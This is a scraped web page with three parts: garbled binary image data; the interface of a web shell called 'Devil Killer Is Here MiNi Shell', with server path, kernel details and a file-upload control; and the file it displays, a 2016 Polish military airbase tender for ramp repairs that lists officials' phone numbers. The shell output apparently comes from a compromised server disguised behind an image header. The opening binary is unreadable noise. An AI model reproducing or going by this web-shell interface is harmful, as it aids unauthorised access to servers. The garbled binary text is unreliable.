JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160927/314140-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 314140 - 2016
              z dnia 2016-09-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Wykonanie remontu rampy przy budynku 66 w kompleksie K  6077, Warszawa, ul. Żwirki i Wigury 1 C<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>1. Baza Lotnictwa Transportowego, krajowy numer identyfikacyjny
              1008894930000, ul.
              ul. Żwirki i Wigury 
              ,
              00909  
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              261 821 316, e-mail
              zampubl@sp.mil.pl, faks
              261 821 316.
              <br />
              Adres strony internetowej (URL): www.1bltr.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: 1. Baza Lotnictwa Transportowego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.1bltr.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />1. Baza Lotnictwa Transportowego, 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 51, nr pokoju 212- Kancelaria Jawna</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie remontu rampy przy budynku 66 w kompleksie K  6077, Warszawa, ul. Żwirki i Wigury 1 C<br /><b>Numer referencyjny: </b>30/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>I.	OPIS PRZEDMIOTU ZAMÓWIENIA
Opis przedmiotu zamówienia dotyczy wykonania remontu rampy przy budynku 66 kompleksie K - 6077 w Warszawie, przyul. Żwirki i Wigury 1 C.
II.	KODY WSPÓLNEGO SŁOWNIKA ZAMÓWIEŃ (CPV)
45000000-7 Roboty budowlane
45210000-2 Roboty budowlane w zakresie budynków
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45410000-4 Tynkowanie
45420000-7 Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie
45440000-3 Roboty malarskie i szklarskie
45443000-4 Roboty elewacyjne

III.	ZAKRES ROBÓT
REMONT RAMPY
ROBOTY DEMONTAŻOWE

-   demontaż schodów żelbetowych
-   demontaż balustrad schodowych
-   demontaż posadzki cementowej
-   demontaż obramowania
-   demontaż belki odbojowej 
-   demontaż tynku ściany podstawy

ROBOTY MONTAŻOWE

     -   montaż obramowania
     -   montaż belki odbojowej 
-   uzupełnienie tynków ścian podstawy
-   montaż jednej warstwy zbrojącej tynku
-   zagruntowanie całości powierzchni 
-   wykonanie tynku o zwiększonej wytrzymałości
-   wykonanie posadzki przemysłowej 
-   wykonanie prac malarskich pasów ostrzegawczych
-   wykonanie i montaż schodów stalowych 
-   wykonanie i montaż balustrad i schodów 

REMONT SZACHTÓW WSYPÓW PIWNICZNYCH

-   wykonanie prac ziemnych  wykopy wąskoprzestrzenne
-   demontaż konstrukcji szachtów
-   wykonanie prac ciesielskich zaszalowania ścian konstrukcji szachtów
-   przygotowanie i montaż zbrojenia ścian konstrukcji szachtów
-   wykonanie prac betoniarskich ścian konstrukcyjnych szachtów
-   demontaż szalunków
-   wykonanie izolacji pionowych ściankonstrukcji szachtów
-   wykonanie prac ziemnych  zasypanie wykopów 

Zakres w/w prac został określony w przedmiarze robót dla wyceny Wykonawcy do przetargu. 

IV.	WYMAGANIA DOTYCZĄCE MATERIAŁÓW DO ZASTOSOWANIA

  -  obramowanie rampy  kształtownik ze stali hutniczej  stal kątowa równoramienna STos o wym. 60 x 60 x 4 mm
    -  uzupełnienie tynków  typowa zaprawa tynkarska cementowo - wapienna
    -  gruntowanie ścian  grunt głębokopenetrujący producentów Ceresit, Knauf, Atlas Uni  Grunt lub inny sugerowany przez producenta lecz nie gorszej jakości
    -  warstwa zbrojąca tynk elewacyjny  siatka podtynkowa z włókna szklanego do systemów ociepleń typu E-glass, o gramaturze 160 gr./m2, impregnowana alkalioodporną dyspersją na bazie lateksu, charakteryzująca się wysoką odpornością na procesy chemiczne zachodzące w warstwie zbrojącej tynków zewnętrznych elewacji 
    -   warstwa zbrojąca tynk elewacyjny  zaprawa klejąca  stanowiąca stabilne podłoże do różnego rodzaju tynków, o przyczepności do betonu  0,25 N/mm2, o czasie zachowania właściwości roboczych do 1 godz.  
    -   tynk ścian cokołu  o strukturze baranek, o zwiększonej odporności na obciążenia mechaniczne Ceresit, Knauf, Atlas lub inny sugerowany przez producenta lecz nie gorszej jakości
  -   posadzka rampy - grunt przemysłowy pod żywicę epoksydową  klasa materiału  B 2  środek nie zawierający rozpuszczalników, jako masa dwuskładnikowa, o gęstości składnika podstawowego 1,1 g/cm3, o gęstości utwardzacza 1,0 g/cm3, o konsystencji, lepkość przy 23 0C  420 mPa-s 
  -   posadzka rampy  żywica epoksydowa  2 składnikowa, o gęstości żywicy - 1,09 g/cm3, o gęstości utwardzacza  0,92 g/cm3, o konsystencji (lepkość) przy + 15 0C  180 mPa-s
    -   belka odbojowa  tarcica z twardego drewna o wym. 150 x 70 mm
    -   pasy ostrzegawcze  wykonanie  dwukolorowe czarno  żółte pasy - farba ftalowa ogólnego stosowania nie gorszej jakości jak Śnieżka, Polinit
    -   schody zewnętrzne rampy  konstrukcja schodów ze stali zwykłej ocynkowanej ogniowo, o szer. 1,2 m, stopnie wykonane w sposób obramowania ze stali kątowej 40 x 40 x 4 mm z wypełnieniem z kraty podestowej
    -   balustrada schodowa i fragmentu rampy  powinna być wykonana na wysokość 1,1 m np. z rurek stalowych o  48 mm w postaci słupków pionowych w rozstawie co 1 m z wypełnieniem z rurek stalowycho  20 mm, umocowanych poziomo i skośnie na schodach w rozstawie 0,12 m, pochwyt balustrady powinien być wykonany z rurki ze stali AISI 304 lub podobnej lecz nie gorszej jakości o średnicy ok. 48 mm i grubości ścianki 2,6 mm
   Zamawiający dopuszcza inny wzór wykonania balustrady ale z zachowaniem obowiązujących przepisów i z zachowaniem pochwytu ze stali nierdzewnej. 
-   materiał do wykonania robót ciesielskich i betoniarskich
       -  wykonanie szalunku  tarcica iglasta, nieobrzynana gr. 32, 48 mm  nieheblowana
       -  pręty stali żebrowanej, zbrojarskiej  8  14 mm
-  beton zwykły z kruszywa naturalnego B15 wykonany na placu budowy  
        -   materiał do wykonania robót izolacyjnych przeciwwilgociowych
             -  papa podkładowa np. produkcji firmy Icopal S.A. Zduńska Wola typu V60 S24 SZYBKI PROFIL SBS wg PN/EN 13707; 2006 o osnowie z welonu szklanego, o gramaturze 60 g/m2, całkowita grubość 2,4 mm względnie materiał sugerowany przez producenta, lecz nie gorszej jakości,  
             -  papa wierzchniego krycia np. produkcji firmy Icopal S.A. Zduńska Wola typu EKSTRADACH TOP 5.2 SZYBKI PROFIL SBS, wg PN/EN 13707; 2006 o osnowie z włókna poliestrowego, o gramaturze 200 g/m2, całkowita grubość 5,2 mm względnie materiał sugerowany przez producenta, lecz nie gorszej jakości,  

Wszystkie materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie oraz powinny być zgodne z obowiązującymi normami, powinny posiadać odpowiednie atesty i świadectwa dopuszczenia do użycia oraz akceptację Inspektora Nadzoru.

Zamawiający nie przewiduje zastosowania wymagań w zakresie dostępności dla osób niepełnosprawnych.
 
V.	OGÓLNE WYMAGANIA 

Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę osób na podstawie umowy o pracę osób wykonujących prace ogólnobudowlane w ilości minimum 3 osób.

VI.	WYMAGANIA DOTYCZĄCE SPRZĘTU

Do wykonania powyższych prac niezbędne będą elektronarzędzia typowe do robót budowlanych tj., piły do cięcia drewna, wiertarki, przecinarki, mieszalniki farb i zapraw, narzędzia osobiste jak: młotki, obcęgi, poziomice, miarki, wiaderka, młotki, szpachle, szpachelki, pace, pędzle, wałki itp. oraz butle na gaz propan  butan z wężem gazowym oraz zestawem palników jednodyszowym, dwudyszowym, szpachelka, nóż do cięcia papy, wałek dociskowy z sylikonową rolką 

VII.	SPOSÓB REALIZACJI ZAMÓWIENIA

1.	Wykonawca ustala kierownika robót do bezpośredniego kontaktu 
z Zamawiającym.
2.	Zamawiający wyznacza Inspektora Nadzoru p. Wojciecha BODURKIEWICZA, tel. 537-707-177, a w razie jego nieobecności Kierownik Sekcji Technicznego Utrzymania Nieruchomości p. Jacek HEJGER, tel. 261-821-262 
3.	Zamawiający do zabezpieczenia robót wyznacza Kierownika Zespołu Zabezpieczenia OKĘCIE  p. Penczo RIZOW tel. 261-821-108 
4.	Wykonawca zrealizuje roboty z własnych materiałów.
5.	 Termin realizacji 60 dni kalendarzowych od daty podpisania umowy.
6.	 Rozliczenie robót po całkowitym ich wykonaniu w sposób ryczałtowo-ilościowy.
7.	Wszystkie materiały powinny posiadać dopuszczenie do obrotu i powszechnego stosowania w budownictwie oraz powinny być zgodne z obowiązującymi normami, powinny posiadać odpowiednie atesty i świadectwa dopuszczenia do użycia oraz akceptację Inspektora Nadzoru.
8.	Odpowiedzialność za jakość wykonywania wszystkich rodzajów robót wchodzących w skład zadania w całości ponosi Wykonawca.
9.	Materiały z demontażu tj. stal obramowania rampy, belka odbojowa, balustrada schodów oraz gruz podlegają usunięciu poza teren 1 Bazy Lotnictwa Transportowego przez Wykonawcę.

VIII.	WARUNKI ODBIORU ROBÓT

1.	Wykonawca zobowiązany jest do powiadomienia Zamawiającego o gotowości do      końcowego odbioru prac, pisemnie najpóźniej w dniu zakończenia umowy
2.	Zamawiający ma obowiązek dokonać końcowego odbioru prac w terminie 7 dni od daty wpłynięcia pisma do Zamawiającego
3.	Przed odbiorem Wykonawca zobowiązany jest dostarczyć, atesty, certyfikaty, zgodności i aprobaty na wszystkie użyte do wykonania zadania materiały
4.	Potwierdzeniem końcowego odbioru będzie Protokół Odbioru Robót i Przekazania do Eksploatacji sporządzony przez przedstawicieli obu stron i zatwierdzony przez Zamawiającego.

IX.	KONTROLA JAKOŚCI ROBÓT

Kontrola jakości użytych materiałów do remontu rampy  jakości użytych materiałów do napraw i wykonywania tynków, kontrola sposobu wykonania tynków na etapie prac zanikowych i wykończeniowych na zgodność ze sztuką budowlaną z opisem przedmiotu zamówienia.

X.	PRZEPISY ZWIĄZANE

 -  kontrola jakości robót - malowanie farbą emulsyjną zewnętrzną ścian wg 
PN- 69/B-10280  o robotach malarskich budowlanych farbami wodnymi i rozcieńczalnymi farbami emulsyjnymi - warunki wykonywania i odbioru robót

XI.	JEDNOSTKA OBMIARU

 (m3)   -   demontaż schodów żelbetowych, wykonanie prac ziemnych  wykopy, demontaż konstrukcji betonowych, wykonanie ścian oporowych, żelbetowych, wykonanie prac ziemnych  zasypanie wykopów, wywóz gruzu
 (m2)      demontaż obróbek blacharskich posadzki cementowej, usunięcie zewnętrznej warstwy betonu demontaż tynku ścian rampy, uzupełnienie tynku rampy, montaż warstwy tynku zbrojącego z kleju i siatki tynkarskiej, wykonanie podkładu gruntującego tynk ścian, wykonanie tynku o zwiększonej odporności na obciążenia mechaniczne, posadzki cementowe zatarte na gładko, posadzka przemysłowa z żywicy poliuretanowej, malowanie pasów ostrzegawczych, wykonanie izolacji poziomych z papy,(m)     -   demontaż i montaż obrzeża rampy z kątownika, demontaż i montaż belki odbojowej rampy,
(szt.)  -   demontaż i montaż balustrady schodów i fragmentu rampy, wykonanie i montaż nakryw wsypów piwnicznych
(t)       -   przygotowanie i montaż zbrojenia konstrukcji ścian, 
(kpl.)  -   wykonanie i montaż schodów stalowych rampy
XII.	ODBIÓR 

Odbioru wykonania robót dokonuje się komisyjnie z udziałem z ramienia Zamawiającego - Inspektor Nadzoru wraz z przedstawicielem Administratora  Kierownikiem Zespołu Zabezpieczenia, przy współudziale Wykonawcy, na podstawie wizji lokalnej. 
Odbiór prac polega na stwierdzeniu jakości użytych materiałów, jakości i ilości wykonanych robót w stosunku do opisu przedmiotu zamówienia, sposób montażu elementów konstrukcyjnych oraz jakość i sposób montażu elementów wykończeniowych  
Niezbędnym elementem wykonania robót jest dostarczenie przez Wykonawcę stosownych deklaracji, certyfikatów na zgodności na użyte materiały.
Zakres robót uważa się za odebrany z chwilą wykonania Protokołu Odbioru Robót i Przekazania do Eksploatacji bez braków, niedoróbek i wad oraz bez uwag. 
XIII.	GWARANCJA WYKONANIA

Na wykonany powyższy zakres prac Wykonawca udziela:
  - 12 miesięcznej rękojmi
  - 24 miesięcznej gwarancji od daty spisania Protokołu Odbioru Końcowego Robót.

Szczegółowe określenie przedmiotu zamówienia znajduje się e opisie przedmiotu zamówienia i przedmiarze robót - załącznik nr 1 i 2 do SIWZ znającego się na stronie internetowej Zamawiającego w zakładce - zamówienia publiczne
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45210000-2,
                45400000-1,
                45410000-4,
                45420000-7,
                45440000-3,
                45443000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 60<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna, iż warunek ten zostanie spełniony jeśli Wykonawca złoży w ofercie przetargowej, pisemne oświadczenie w przedmiotowym zakresie (załącznik nr 5 do SWZ) <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.Zamawiający uzna, iż warunek ten zostanie spełniony jeśli Wykonawca złoży w ofercie przetargowej, pisemne oświadczenie w przedmiotowym zakresie (załącznik nr 5 do SWZ) <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                
1. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę osób na podstawie umowy o pracę osób wykonujących prace ogólnobudowlane w ilości minimum 3 osób.
2. Dysponują co najmniej jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadająca stosowne uprawnienia budowlane - drogowe, przynależność do Izby Inżynierów Budownictwa.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, (w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy);

W terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 ustawy p.z.p. Wykonawca (lub każdy z Wykonawców wspólnie ubiegających się o zamówienie) zobowiązany jest przekazać Zamawiającemu oświadczenie  o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa  w art. 24 ust. 1 pkt 23 ustawy p.z.p. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia (załącznik nr 7 do SIWZ).</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz osób (pracowników), skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - według załącznika nr 8  do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
